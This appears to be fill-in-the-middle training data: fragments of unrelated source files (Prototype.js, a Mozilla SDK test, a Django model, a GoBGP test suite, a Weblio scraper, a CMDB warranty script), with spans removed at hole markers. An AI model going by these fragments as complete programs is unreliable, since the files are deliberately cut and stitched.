if (element.removeEventListener) {
element.removeEventListener(name, wrapper, false);
} else {
element.detachEvent("on" + name, wrapper);
}
destroyWrapper(id, eventName, handler);
return element;
},
fire: function(element, eventName, memo) {
element = $(element);
if (element == document && document.createEvent && !element.dispatchEvent)
element = document.documentElement;
if (document.createEvent) {
var event = document.createEvent("HTMLEvents");
event.initEvent("dataavailable", true, true);
} else {
var event = document.createEventObject();
event.eventType = "ondataavailable";
}
event.eventName = eventName;
event.memo = memo || { };
if (document.createEvent) {
element.dispatchEvent(event);
} else {
element.fireEvent(event.eventType, event);
}
return event;
}
};
})());
Object.extend(Event, Event.Methods);
Element.addMethods({
fire: Event.fire,
observe: Event.observe,
stopObserving: Event.stopObserving
});
Object.extend(document, {
fire: Element.Methods.fire.methodize(),
observe: Element.Methods.observe.methodize(),
stopObserving: Element.Methods.stopObserving.methodize()
});
(function() {
/* Support for the DOMContentLoaded event is based on work by Dan Webb,
Matthias Miller, Dean Edwards and John Resig. */
var timer, fired = false;
function fireContentLoadedEvent() {
if (fired) return;
if (timer) window.clearInterval(timer);
document.fire("dom:loaded");
fired = true;
}
if (document.addEventListener) {
if (Prototype.Browser.WebKit) {
timer = window.setInterval(function() {
if (/loaded|complete/.test(document.readyState))
fireContentLoadedEvent();
}, 0);
Event.observe(window, "load", fireContentLoadedEvent);
} else {
document.addEventListener("DOMContentLoaded",
fireContentLoadedEvent, false);
}
} else {
document.write("<script id=__onDOMContentLoaded defer src=//:><\/script>");
$("__onDOMContentLoaded").onreadystatechange = function() {
if (this.readyState == "complete") {
this.onreadystatechange = null;
fireContentLoadedEvent();
}
};
}
})();
/*------------------------------- DEPRECATED -------------------------------*/
Hash.toQueryString = Object.toQueryString;
var Toggle = { display: Element.toggle };
Element.Methods.childOf = Element.Methods.descendantOf;
var Insertion = {
Before: function(element, content) {
return Element.insert(element, {before:content});
},
Top: function(element, content) {
return Element.insert(element, {top:content});
},
Bottom: function(element, content) {
return Element.insert(element, {bottom:content});
},
After: function(element, content) {
return Element.insert(element, {after:content});
}
};
var $continue = new Error('"throw $continue" is deprecated, use "return" instead');
// This should be moved to script.aculo.us; notice the deprecated methods
// further below, that map to the newer Element methods.
var Position = {
// set to true if needed, warning: firefox performance problems
// NOT needed for page scrolling, only if draggable contained in
// scrollable elements
includeScrollOffsets: false,
// must be called before calling withinIncludingScrolloffsets, every time the
// page is scrolled
prepare: function() {
this.deltaX = window.pageXOffset
|| document.documentElement.scrollLeft
|| document.body.scrollLeft
|| 0;
this.deltaY = window.pageYOffset
|| document.documentElement.scrollTop
|| document.body.scrollTop
|| 0;
},
// caches x/y coordinate pair to use with overlap
within: function(element, x, y) {
if (this.includeScrollOffsets)
return this.withinIncludingScrolloffsets(element, x, y);
this.xcomp = x;
this.ycomp = y;
this.offset = Element.cumulativeOffset(element);
return (y >= this.offset[1] &&
y < this.offset[1] + element.offsetHeight &&
x >= this.offset[0] &&
x < this.offset[0] + element.offsetWidth);
},
withinIncludingScrolloffsets: function(element, x, y) {
var offsetcache = Element.cumulativeScrollOffset(element);
this.xcomp = x + offsetcache[0] - this.deltaX;
this.ycomp = y + offsetcache[1] - this.deltaY;
this.offset = Element.cumulativeOffset(element);
return (this.ycomp >= this.offset[1] &&
this.ycomp < this.offset[1] + element.offsetHeight &&
this.xcomp >= this.offset[0] &&
this.xcomp < this.offset[0] + element.offsetWidth);
},
// within must be called directly before
overlap: function(mode, element) {
if (!mode) return 0;
if (mode == 'vertical')
return ((this.offset[1] + element.offsetHeight) - this.ycomp) /
element.offsetHeight;
if (mode == 'horizontal')
return ((this.offset[0] + element.offsetWidth) - this.xcomp) /
element.offsetWidth;
},
// Deprecation layer -- use newer Element methods now (1.5.2).
cumulativeOffset: Element.Methods.cumulativeOffset,
positionedOffset: Element.Methods.positionedOffset,
absolutize: function(element) {
Position.prepare();
return Element.absolutize(element);
},
relativize: function(element) {
Position.prepare();
return Element.relativize(element);
},
realOffset: Element.Methods.cumulativeScrollOffset,
offsetParent: Element.Methods.getOffsetParent,
page: Element.Methods.viewportOffset,
clone: function(source, target, options) {
options = options || { };
return Element.clonePosition(target, source, options);
}
};
/*--------------------------------------------------------------------------*/
if (!document.getElementsByClassName) document.getElementsByClassName = function(instanceMethods){
function iter(name) {
return name.blank() ? null : "[contains(concat(' ', @class, ' '), ' " + name + " ')]";
}
instanceMethods.getElementsByClassName = Prototype.BrowserFeatures.XPath ?
function(element, className) {
className = className.toString().strip();
var cond = /\s/.test(className) ? $w(className).map(iter).join('') : iter(className);
return cond ? document._getElementsByXPath('.//*' + cond, element) : [];
} : function(element, className) {
className = className.toString().strip();
var elements = [], classNames = (/\s/.test(className) ? $w(className) : null);
if (!classNames && !className) return elements;
var nodes = $(element).getElementsByTagName('*');
className = ' ' + className + ' ';
for (var i = 0, child, cn; child = nodes[i]; i++) {
if (child.className && (cn = ' ' + child.className + ' ') && (cn.include(className) ||
(classNames && classNames.all(function(name) {
return !name.toString().blank() && cn.include(' ' + name + ' ');
}))))
elements.push(Element.extend(child));
}
return elements;
};
return function(className, parentElement) {
return $(parentElement || document.body).getElementsByClassName(className);
};
}(Element.Methods);
/*--------------------------------------------------------------------------*/
Element.ClassNames = Class.create();
Element.ClassNames.prototype = {
initialize: function(element) {
this.element = $(element);
},
_each: function(iterator) {
this.element.className.split(/\s+/).select(function(name) {
return name.length > 0;
})._each(iterator);
},
set: function(className) {
this.element.className = className;
},
add: function(classNameToAdd) {
if (this.include(classNameToAdd)) return;
this.set($A(this).concat(classNameToAdd).join(' '));
},
remove: function(classNameToRemove) {
if (!this.include(classNameToRemove)) return;
this.set($A(this).without(classNameToRemove).join(' '));
},
toString: function() {
return $A(this).join(' ');
}
};
Object.extend(Element.ClassNames.prototype, Enumerable);
/*--------------------------------------------------------------------------*/
Element.addMethods();<|fim▁end|>
|
var Abstract = { };
|
<|file_name|>test-system.js<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
"use strict";
const runtime = require("sdk/system/runtime");
const system = require("sdk/system");
exports["test system architecture and compiler"] = function(assert) {
if (system.architecture !== null) {
assert.equal(
runtime.XPCOMABI.indexOf(system.architecture), 0,
"system.architecture is starting substring of runtime.XPCOMABI"
);
}
if (system.compiler !== null) {
assert.equal(
runtime.XPCOMABI.indexOf(system.compiler),
runtime.XPCOMABI.length - system.compiler.length,
"system.compiler is trailing substring of runtime.XPCOMABI"
);
}
assert.ok(<|fim▁hole|> system.architecture === null || typeof(system.architecture) === "string",
"system.architecture is string or null if not supported by platform"
);
assert.ok(
system.compiler === null || typeof(system.compiler) === "string",
"system.compiler is string or null if not supported by platform"
);
};
require("test").run(exports);<|fim▁end|>
| |
<|file_name|>CacheableStatement.java<|end_file_name|><|fim▁begin|>package com.tesora.dve.sql.statement;
/*
* #%L
* Tesora Inc.
* Database Virtualization Engine
* %%
* Copyright (C) 2011 - 2014 Tesora Inc.
* %%
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License, version 3,<|fim▁hole|> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
* #L%
*/
import com.tesora.dve.lockmanager.LockType;
import com.tesora.dve.sql.expression.TableKey;
import com.tesora.dve.sql.util.ListSet;
public interface CacheableStatement {
public LockType getLockType();
public ListSet<TableKey> getAllTableKeys();
}<|fim▁end|>
|
* as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from django.db import models
from botManager.models import Bot<|fim▁hole|>
class Activist(models.Model):
identifier = models.CharField(max_length=200)
name = models.CharField(max_length=200)
username = models.CharField(max_length=200)
reg_date = models.DateTimeField('Date registered', auto_now_add=True)
bot = models.ForeignKey(Bot) # on_delete=models.CASCADE)
def __str__(self):
return '{} ({}: {})'.format(self.name, self.bot.name, self.identifier)<|fim▁end|>
| |
<|file_name|>bgp_router_test.py<|end_file_name|><|fim▁begin|># Copyright (C) 2015 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import json
import sys
import time
import unittest
from fabric.api import local
import nose
from lib.noseplugin import OptionParser, parser_option
from lib import base
from lib.base import (
BGP_FSM_IDLE,
BGP_FSM_ACTIVE,
BGP_FSM_ESTABLISHED,
BGP_ATTR_TYPE_MULTI_EXIT_DISC,
BGP_ATTR_TYPE_LOCAL_PREF,
wait_for_completion,
assert_several_times,
)
from lib.gobgp import (
GoBGPContainer,
extract_path_attribute,
)
from lib.quagga import QuaggaBGPContainer
from lib.exabgp import ExaBGPContainer
class GoBGPTestBase(unittest.TestCase):
@classmethod
def setUpClass(cls):
gobgp_ctn_image_name = parser_option.gobgp_image
base.TEST_PREFIX = parser_option.test_prefix
g1 = GoBGPContainer(name='g1', asn=65000, router_id='192.168.0.1',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level)
q1 = QuaggaBGPContainer(name='q1', asn=65001, router_id='192.168.0.2')
q2 = QuaggaBGPContainer(name='q2', asn=65002, router_id='192.168.0.3')
q3 = QuaggaBGPContainer(name='q3', asn=65003, router_id='192.168.0.4')
qs = [q1, q2, q3]
ctns = [g1, q1, q2, q3]
initial_wait_time = max(ctn.run() for ctn in ctns)
time.sleep(initial_wait_time)
for q in qs:
g1.add_peer(q, passwd='passwd')
q.add_peer(g1, passwd='passwd', passive=True)
# advertise a route from q1, q2, q3
for idx, q in enumerate(qs):
route = '10.0.{0}.0/24'.format(idx + 1)
q.add_route(route)
cls.gobgp = g1
cls.quaggas = {'q1': q1, 'q2': q2, 'q3': q3}
# test that each neighbor state becomes established
def test_01_neighbor_established(self):
for q in self.quaggas.itervalues():
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q)
def test_02_check_gobgp_global_rib(self):
for q in self.quaggas.itervalues():
# paths expected to exist in gobgp's global rib
routes = q.routes.keys()
timeout = 120
interval = 1
count = 0
while True:
# gobgp's global rib
state = self.gobgp.get_neighbor_state(q)
self.assertEqual(state, BGP_FSM_ESTABLISHED)
global_rib = [p['prefix'] for p in self.gobgp.get_global_rib()]
for p in global_rib:
if p in routes:
routes.remove(p)
if len(routes) == 0:
break
time.sleep(interval)
count += interval
if count >= timeout:
raise Exception('timeout')
# check gobgp properly adds its own asn to aspath
def test_03_check_gobgp_adj_out_rib(self):
for q in self.quaggas.itervalues():
for path in self.gobgp.get_adj_rib_out(q):
asns = path['aspath']
self.assertTrue(self.gobgp.asn in asns)
# check routes are properly advertised to all BGP speakers
def test_04_check_quagga_global_rib(self):
interval = 1
timeout = int(120 / interval)
for q in self.quaggas.itervalues():
done = False
for _ in range(timeout):
if done:
break
global_rib = q.get_global_rib()
global_rib = [p['prefix'] for p in global_rib]
if len(global_rib) < len(self.quaggas):
time.sleep(interval)
continue
self.assertTrue(len(global_rib) == len(self.quaggas))
for c in self.quaggas.itervalues():
for r in c.routes:
self.assertTrue(r in global_rib)
done = True<|fim▁hole|> if done:
continue
# should not reach here
raise AssertionError
def test_05_add_quagga(self):
q4 = QuaggaBGPContainer(name='q4', asn=65004, router_id='192.168.0.5')
self.quaggas['q4'] = q4
initial_wait_time = q4.run()
time.sleep(initial_wait_time)
self.gobgp.add_peer(q4)
q4.add_peer(self.gobgp)
q4.add_route('10.0.4.0/24')
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q4)
def test_06_check_global_rib(self):
self.test_02_check_gobgp_global_rib()
self.test_04_check_quagga_global_rib()
def test_07_stop_one_quagga(self):
g1 = self.gobgp
q4 = self.quaggas['q4']
q4.stop()
self.gobgp.wait_for(expected_state=BGP_FSM_ACTIVE, peer=q4)
g1.del_peer(q4)
del self.quaggas['q4']
# check gobgp properly sends a withdrawal message for q4's route
def test_08_check_global_rib(self):
self.test_02_check_gobgp_global_rib()
self.test_04_check_quagga_global_rib()
def test_09_add_distant_relative(self):
q1 = self.quaggas['q1']
q2 = self.quaggas['q2']
q3 = self.quaggas['q3']
q5 = QuaggaBGPContainer(name='q5', asn=65005, router_id='192.168.0.6')
initial_wait_time = q5.run()
time.sleep(initial_wait_time)
for q in [q2, q3]:
q5.add_peer(q)
q.add_peer(q5)
med200 = {'name': 'med200',
'type': 'permit',
'match': '0.0.0.0/0',
'med': 200}
q2.add_policy(med200, self.gobgp, 'out')
med100 = {'name': 'med100',
'type': 'permit',
'match': '0.0.0.0/0',
'med': 100}
q3.add_policy(med100, self.gobgp, 'out')
q5.add_route('10.0.6.0/24')
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q2)
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q3)
q2.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q5)
q3.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q5)
timeout = 120
interval = 1
count = 0
while True:
paths = self.gobgp.get_adj_rib_out(q1, '10.0.6.0/24')
if len(paths) > 0:
path = paths[0]
print "{0}'s nexthop is {1}".format(path['nlri']['prefix'],
path['nexthop'])
n_addrs = [i[1].split('/')[0] for i in self.gobgp.ip_addrs]
if path['nexthop'] in n_addrs:
break
time.sleep(interval)
count += interval
if count >= timeout:
raise Exception('timeout')
def test_10_originate_path(self):
self.gobgp.add_route('10.10.0.0/24')
dst = self.gobgp.get_global_rib('10.10.0.0/24')
self.assertTrue(len(dst) == 1)
self.assertTrue(len(dst[0]['paths']) == 1)
path = dst[0]['paths'][0]
self.assertTrue(path['nexthop'] == '0.0.0.0')
self.assertTrue(len(path['aspath']) == 0)
def test_11_check_adj_rib_out(self):
for q in self.quaggas.itervalues():
paths = self.gobgp.get_adj_rib_out(q, '10.10.0.0/24')
self.assertTrue(len(paths) == 1)
path = paths[0]
peer_info = self.gobgp.peers[q]
local_addr = peer_info['local_addr'].split('/')[0]
self.assertTrue(path['nexthop'] == local_addr)
self.assertTrue(path['aspath'] == [self.gobgp.asn])
def test_12_disable_peer(self):
q1 = self.quaggas['q1']
self.gobgp.disable_peer(q1)
self.gobgp.wait_for(expected_state=BGP_FSM_IDLE, peer=q1)
time.sleep(3)
for route in q1.routes.iterkeys():
dst = self.gobgp.get_global_rib(route)
self.assertTrue(len(dst) == 0)
for q in self.quaggas.itervalues():
if q is q1:
continue
paths = self.gobgp.get_adj_rib_out(q, route)
self.assertTrue(len(paths) == 0)
def test_13_enable_peer(self):
q1 = self.quaggas['q1']
self.gobgp.enable_peer(q1)
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=q1)
def test_14_check_adj_rib_out(self):
self.test_11_check_adj_rib_out()
def test_15_check_active_connection(self):
g1 = self.gobgp
g2 = GoBGPContainer(name='g2', asn=65000, router_id='192.168.0.7',
ctn_image_name=self.gobgp.image,
log_level=parser_option.gobgp_log_level)
time.sleep(g2.run())
self.quaggas['g2'] = g2
g2.add_peer(g1, passive=True)
g1.add_peer(g2)
g1.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=g2)
def test_16_check_local_pref_and_med_handling(self):
g1 = self.gobgp
g1.add_route('10.20.0.0/24', local_pref=1000, med=2000)
# iBGP peer
g2 = self.quaggas['g2']
paths = g2.get_global_rib('10.20.0.0/24')
self.assertTrue(len(paths) == 1)
self.assertTrue(len(paths[0]['paths']) == 1)
path = paths[0]['paths'][0]
local_pref = extract_path_attribute(path, BGP_ATTR_TYPE_LOCAL_PREF)
self.assertTrue(local_pref['value'] == 1000)
med = extract_path_attribute(path, BGP_ATTR_TYPE_MULTI_EXIT_DISC)
self.assertTrue(med['metric'] == 2000)
# eBGP peer
q1 = self.quaggas['q1']
paths = q1.get_global_rib('10.20.0.0/24')
self.assertTrue(len(paths) == 1)
path = paths[0]
local_pref = extract_path_attribute(path, BGP_ATTR_TYPE_LOCAL_PREF)
# local_pref's default value is 100
self.assertTrue(local_pref['value'] == 100)
med = extract_path_attribute(path, BGP_ATTR_TYPE_MULTI_EXIT_DISC)
self.assertTrue(med['metric'] == 2000)
def test_17_check_shutdown(self):
g1 = self.gobgp
q1 = self.quaggas['q1']
q2 = self.quaggas['q2']
q3 = self.quaggas['q3']
q2.add_route('20.0.0.0/24')
q3.add_route('20.0.0.0/24')
self.test_01_neighbor_established()
self.test_02_check_gobgp_global_rib()
paths = q1.get_global_rib('20.0.0.0/24')
self.assertEqual(len(paths), 1)
n_addrs = [i[1].split('/')[0] for i in self.gobgp.ip_addrs]
self.assertIn(paths[0]['nexthop'], n_addrs)
q3.stop()
self.gobgp.wait_for(expected_state=BGP_FSM_ACTIVE, peer=q3)
paths = q1.get_global_rib('20.0.0.0/24')
self.assertEqual(len(paths), 1)
self.assertIn(paths[0]['nexthop'], n_addrs)
g1.del_peer(q3)
del self.quaggas['q3']
def test_18_check_withdrawal(self):
g1 = self.gobgp
q1 = self.quaggas['q1']
q2 = self.quaggas['q2']
g1.add_route('30.0.0.0/24')
q1.add_route('30.0.0.0/24')
self.test_01_neighbor_established()
self.test_02_check_gobgp_global_rib()
paths = g1.get_adj_rib_out(q1, '30.0.0.0/24')
self.assertEqual(len(paths), 1)
self.assertNotIn('source-id', paths[0])
paths = g1.get_adj_rib_out(q2, '30.0.0.0/24')
self.assertEqual(len(paths), 1)
self.assertNotIn('source-id', paths[0])
g1.local('gobgp global rib del 30.0.0.0/24')
def f():
paths = g1.get_adj_rib_out(q1, '30.0.0.0/24')
self.assertEqual(len(paths), 0)
paths = g1.get_adj_rib_out(q2, '30.0.0.0/24')
self.assertEqual(len(paths), 1)
self.assertEqual(paths[0]['source-id'], '192.168.0.2')
assert_several_times(f)
def test_19_check_grpc_add_neighbor(self):
g1 = self.gobgp
e1 = ExaBGPContainer(name='e1', asn=65000, router_id='192.168.0.7')
time.sleep(e1.run())
e1.add_peer(g1)
self.quaggas['e1'] = e1
n = e1.peers[g1]['local_addr'].split('/')[0]
g1.local('gobgp n add {0} as 65000'.format(n))
g1.add_peer(e1, reload_config=False)
g1.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=e1)
def test_20_check_grpc_del_neighbor(self):
g1 = self.gobgp
e1 = self.quaggas['e1']
n = e1.peers[g1]['local_addr'].split('/')[0]
g1.local('gobgp n del {0}'.format(n))
g1.del_peer(e1, reload_config=False)
def test_21_check_withdrawal_2(self):
g1 = self.gobgp
g2 = self.quaggas['g2']
prefix = '40.10.0.0/24'
g1.add_route(prefix)
wait_for_completion(lambda: len(g1.get_global_rib(prefix)) == 1)
wait_for_completion(lambda: len(g2.get_global_rib(prefix)) == 1)
r = g2.local('gobgp monitor global rib -j', stream=True, tty=False)
g1.local('gobgp global rib del 40.10.0.0/24')
del g1.routes[prefix]
wait_for_completion(lambda: len(g1.get_global_rib(prefix)) == 0)
wait_for_completion(lambda: len(g2.get_global_rib(prefix)) == 0)
ret = json.loads(r.next())
self.assertTrue(ret[0]['nlri']['prefix'] == prefix)
self.assertTrue('withdrawal' in ret[0])
def test_22_check_cli_sorted(self):
g1 = self.gobgp
cnt = 0
def next_prefix():
for i in range(100, 105):
for j in range(100, 105):
yield '{0}.{1}.0.0/24'.format(i, j)
for p in next_prefix():
g1.local('gobgp global rib add {0}'.format(p))
cnt += 1
cnt2 = 0
g = next_prefix()
n = g.next()
for path in g1.local("gobgp global rib", capture=True).split('\n')[1:]:
if [elem for elem in path.split(' ') if elem != ''][1] == n:
try:
cnt2 += 1
n = g.next()
except StopIteration:
break
self.assertTrue(cnt == cnt2)
def test_23_check_withdrawal3(self):
gobgp_ctn_image_name = parser_option.gobgp_image
g1 = self.gobgp
g3 = GoBGPContainer(name='g3', asn=65006, router_id='192.168.0.8',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level)
g4 = GoBGPContainer(name='g4', asn=65007, router_id='192.168.0.9',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level)
initial_wait_time = max(ctn.run() for ctn in [g3, g4])
time.sleep(initial_wait_time)
self.quaggas = {'g3': g3, 'g4': g4}
g3.local('gobgp global rib add 50.0.0.0/24')
g1.add_peer(g3, passive=True)
g3.add_peer(g1)
g1.add_peer(g4, passive=True)
g4.add_peer(g1)
self.test_01_neighbor_established()
self.test_02_check_gobgp_global_rib()
g4.local('gobgp global rib add 50.0.0.0/24 med 10')
paths = g1.get_adj_rib_out(g3, '50.0.0.0/24')
self.assertTrue(len(paths) == 0)
paths = g1.get_adj_rib_out(g4, '50.0.0.0/24')
self.assertTrue(len(paths) == 1)
self.assertTrue(paths[0]['source-id'] == '192.168.0.8')
g3.local('gobgp global rib del 50.0.0.0/24')
paths = g1.get_adj_rib_out(g3, '50.0.0.0/24')
self.assertTrue(len(paths) == 1)
self.assertTrue(paths[0]['source-id'] == '192.168.0.9')
paths = g1.get_adj_rib_out(g4, '50.0.0.0/24')
self.assertTrue(len(paths) == 0)
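# Entry point: bail out unless docker is available, then hand the scenario tests to nose.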
if __name__ == '__main__':
output = local("which docker 2>&1 > /dev/null ; echo $?", capture=True)
    if int(output) != 0:
print "docker not found"
sys.exit(1)
nose.main(argv=sys.argv, addplugins=[OptionParser()],
defaultTest=sys.argv[0])<|fim▁end|>
| |
<|file_name|>getDetail.py<|end_file_name|><|fim▁begin|># -*- coding:utf-8 -*-
#html_doc = '''<div><a href="http://www.weblio.jp/content/%E5%BD%A2%E5%AE%B9%E5%8B%95%E8%A9%9E" title="形容動詞の意味" class=crosslink>形容動詞</a>「<a href="http://www.weblio.jp/content/%E3%82%A2%E3%83%BC%E3%83%86%E3%82%A3%E3%83%95%E3%82%A3%E3%82%B7%E3%83%A3%E3%83%AB" title="アーティフィシャルの意味" class=crosslink>アーティフィシャル</a>だ」が、<a href="http://www.weblio.jp/content/%E6%8E%A5%E5%B0%BE%E8%AA%9E" title="接尾語の意味" class=crosslink>接尾語</a>「さ」により<a href="http://www.weblio.jp/content/%E4%BD%93%E8%A8%80" title="体言の意味" class=crosslink>体言</a>化した形。<br><br class=nhgktD><div><!--AVOID_CROSSLINK--><p class=nhgktL>終止形</p><p class=nhgktR>アーティフィシャルだ <a href="http://www.weblio.jp/content/%E3%82%A2%E3%83%BC%E3%83%86%E3%82%A3%E3%83%95%E3%82%A3%E3%82%B7%E3%83%A3%E3%83%AB" title="アーティフィシャル">» 「アーティフィシャル」の意味を調べる</a></p><!--/AVOID_CROSSLINK--><br class=clr></div>'''
#from bs4 import BeautifulSoup
#soup = BeautifulSoup(html_doc, 'html.parser')
#a = [text for text in soup.stripped_strings]
#print ''.join(a[:-1])
import socket
import urllib2
import traceback
import re
#import MySQLdb
import time
from bs4 import BeautifulSoup
#from complainDetail import *
timeout = 10
socket.setdefaulttimeout(timeout)
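# Fetch the Weblio entry page at `link`, pull the definition text out of the
# "Nhgkt" block and print it joined by '#' (plus the conjugation details when an
# nhgktL/nhgktR pair is present). Retries up to 3 times; returns 0 on success
# and -1 if the page could not be fetched.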
def fetchDetail(link, word):
tryNum = 3
tn = 0
while tn < tryNum:
details = []
try:
f = urllib2.urlopen(link)
content = f.read()
soup = BeautifulSoup(content, 'html.parser')
main = soup.find(attrs={'class':'Nhgkt'})
left = soup.find_all(attrs={'class':'nhgktL'})
right = soup.find_all(attrs={'class':'nhgktR'})
if(left):
for text in main.stripped_strings:
if(re.match(u'終止形$', text)!=None):break
details.append(text)
print '#'.join(details).encode('utf8'),
print '%',left[0].string.encode('utf8'), ':', <|fim▁hole|> aList = right[0].find_all('a')
for a in aList:
print a['title'].encode('utf8'),
print
else:
for text in main.stripped_strings:
if(u'»' in text):break
details.append(text)
print '#'.join(details).encode('utf8')
break
except Exception,e:
print e
tn = tn + 1
#print url, " access error!"
#print "try ", tn, "time"
time.sleep(5)
if tn==tryNum:
#print "Cannot fetch page!"
return -1
return 0
if __name__ == "__main__":
wordsUrlList = open('verb_ok.txt')
for line in wordsUrlList.readlines():
l = line.split(' ')
link = l[0]
word = l[1].strip('\n')
print word, '%', link, '%',
if(fetchDetail(link, word)==-1):
print link, word, "ERROR."
print "Finished"
#indexUrl = "http://www.weblio.jp/category/dictionary/nhgkt/aa"
#f = urllib2.urlopen(indexUrl)
#content = f.read()
#soup = BeautifulSoup(content, 'html.parser')
#urlTable = soup.find(attrs={'class':'kanaAlpha'})
#aList = urlTable.find_all('a')
#for a in aList:
# print '"'+a['href']+'",'<|fim▁end|>
| |
<|file_name|>test-Hex to Safe Color.js<|end_file_name|><|fim▁begin|>munit( 'Rule Compression.Hex to Safe Color', function( assert ) {
assert.exists( "Table", CSSCompressor.tables[ 'Hex to Safe Color' ] );
testRule( assert, 'Hex to Safe Color', [
{
name: 'Basic',
actual: '#000080',
expected: 'navy'
},
{
name: 'Basic Uppercase',
actual: '#c0c0c0',
expected: 'silver'
},
{
name: 'Unsafe Color',
actual: '#f0ffff',<|fim▁hole|>
{
name: 'No Conversion',
actual: '#f02de5',
expected: undefined
}
]);
});<|fim▁end|>
|
expected: undefined
},
|
<|file_name|>getcmdbinfo.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python<|fim▁hole|>
#auth: asher
#date: 20171027
#purpose: get useful info from the json files
import ConfigParser
import time
import datetime
import requests
import fileinput
import sys
import os
import codecs
import json
import getWarranty
reload(sys)
sys.setdefaultencoding( "utf-8" )
def getConfig():
"""
    Read the shared configuration data in one place, so it does not have to be repeated in every function.
"""
global cmdbpath
global idccontactinfoJson,iprangesJson,itemsJson,serverJson,dellserverjson
fileName = os.path.abspath(__file__)
binPath = os.path.dirname(os.path.realpath(__file__))
basePath = os.path.dirname(binPath)
confPath = basePath + '/config/'
# print confPath
conf = ConfigParser.ConfigParser()
conf.read("%s/cmdb.ini" % confPath)
#####
cmdbpath = conf.get('getcmdbinfo','cmdbpath')
# JsonFilesPath = basePath + '/files/'
if not os.path.isdir(cmdbpath):
os.mkdir(cmdbpath)
#idccontactinfo = idccontactinfo.json
idccontactinfoJson = cmdbpath + conf.get('getcmdbinfo','idccontactinfo')
iprangesJson = cmdbpath + conf.get('getcmdbinfo','ipranges')
itemsJson = cmdbpath + conf.get('getcmdbinfo','items')
serverJson = cmdbpath + conf.get('getcmdbinfo','serverinfosforidcmaintain')
dellserverjson = cmdbpath + conf.get('getcmdbinfo','dellserverjson')
def cmdbServer(stg):
    ## Given the service tag (stg) passed in, return the server-related info and its IDC info
newdict = {}
getConfig()
with open(serverJson,'r') as f:
serverinfor = json.loads(f.read())
if serverinfor.has_key(stg):
dicts = serverinfor[stg]
newdict['item_id'] = dicts['item_id']
#hostname:HN-dl8
newdict['hostname'] = dicts['hostname']
#status:项目专属
newdict['status'] = dicts['status']
#idc_id:海宁
newdict['idc_id'] = dicts['idc_id']
#floor:3
newdict['floor'] = dicts['floor']
#cabinet:K08
newdict['cabinet'] = dicts['cabinet']
#cabinet_pos:10
newdict['cabinet_pos'] = dicts['cabinet_pos']
return newdict
def idcContact(stg):
    ## Get a server's IDC contact info, looked up via its service tag (stg)
    ## Usage:
#iddc = idcContact(stg1)
#for k,v in iddc.items():
# print k,v
idcnew = {}
getConfig()
stg1 = stg
try:
dicts = cmdbServer(stg1)
idcid = u'%s' % dicts['idc_id'].encode('UTF-8')
with open(idccontactinfoJson,'r') as f:
#idcInf = json.loads(f.read(),encoding='utf-8')
idcInf = json.loads(f.read())
if idcInf.has_key(idcid):
idcnew['tel'] = idcInf[idcid]['tel']
idcnew['address'] = idcInf[idcid]['address']
idcnew['name'] = idcInf[idcid]['name']
#return idcInf[idcid]
return idcnew
except:
pass
def dellServerInfo(stg):
"""
    Look up a server's warranty/expiry status in the local store of data already downloaded from the Dell website.
"""
dells = {}
getConfig()
stg1 = stg
with open(dellserverjson,'r') as f:
dellInf = json.loads(f.read())
if dellInf.has_key(stg1):
dells['MachineDescription'] = dellInf[stg1]['MachineDescription']
dells['StartDate'] = dellInf[stg1]['StartDate']
dells['EndDate'] = dellInf[stg1]['EndDate']
expiretime = dells['EndDate']
nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
expire1 = datetime.datetime.strptime(expiretime,"%Y-%m-%d %H:%M:%S")
nowtime1 = datetime.datetime.strptime(nowtime,"%Y-%m-%d %H:%M:%S")
remaintime = str(expire1 - nowtime1).split('days')[0]
dells['RemainDays'] = remaintime
dells['ServiceLevelDescription'] = dellInf[stg1]['ServiceLevelDescription']
return dells
else:
try:
newinfos = getWarranty.getDellExpires(stg)
dells['MachineDescription'] = newinfos['MachineDescription']
dells['StartDate'] = newinfos['StartDate']
dells['EndDate'] = newinfos['EndDate']
expiretime = dells['EndDate']
nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
expire1 = datetime.datetime.strptime(expiretime,"%Y-%m-%d %H:%M:%S")
nowtime1 = datetime.datetime.strptime(nowtime,"%Y-%m-%d %H:%M:%S")
remaintime = str(expire1 - nowtime1).split('days')[0]
dells['RemainDays'] = remaintime
dells['ServiceLevelDescription'] = newinfos['ServiceLevelDescription']
bigdicts = {}
bigdicts[stg1] = dells
getWarranty.writedict2json(bigdicts,dellserverjson)
return dells
except TypeError:
pass
#import getWarranty
if __name__ == '__main__':
#stg1 = 'H1LMKY1'
